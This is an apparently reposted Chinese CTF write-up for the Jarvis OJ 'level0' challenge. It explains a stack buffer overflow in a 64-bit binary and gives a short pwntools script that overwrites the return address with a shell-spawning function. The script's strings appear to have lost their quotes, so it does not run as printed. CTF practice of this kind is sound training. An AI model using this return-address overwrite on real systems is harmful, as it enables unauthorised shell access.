码迷,mamicode.com
首页 > 其他好文 > 详细

Pwn-level0

时间:2019-10-08 21:47:15      阅读:73      评论:0      收藏:0      [点我收藏+]

标签:shell   文件的   rac   rabl   检查   64位   图片   import   cal   

题目地址

https://dn.jarvisoj.com/challengefiles/level0.b9ded3801d6dd36a97468e128b81a65d

 

第一步先看文件的属性    64位

技术图片

 之后检查保护性

技术图片

 

 用IDA打开,观察伪代码F5
技术图片

 跳出hello world,然后返回vulnerable_function函数

技术图片

 这边发现一个可以直接get shell的函数callsystem

技术图片

 

read函数存在栈溢出,我们可以利用栈溢出把返回地址覆盖程callsystem的入口地址

技术图片

 技术图片

需要覆盖0x88个字符(0x80+0x8)

 

利用代码如下

from pwn import *
r=remote(pwn2.jarvisoj.com,9881)
payload=a*0x88+p64(0x400596)
r.sendline(payload)
r.interactive()

执行

技术图片

 

 



 

Pwn-level0

标签:shell   文件的   rac   rabl   检查   64位   图片   import   cal   

原文地址:https://www.cnblogs.com/gaonuoqi/p/11637952.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!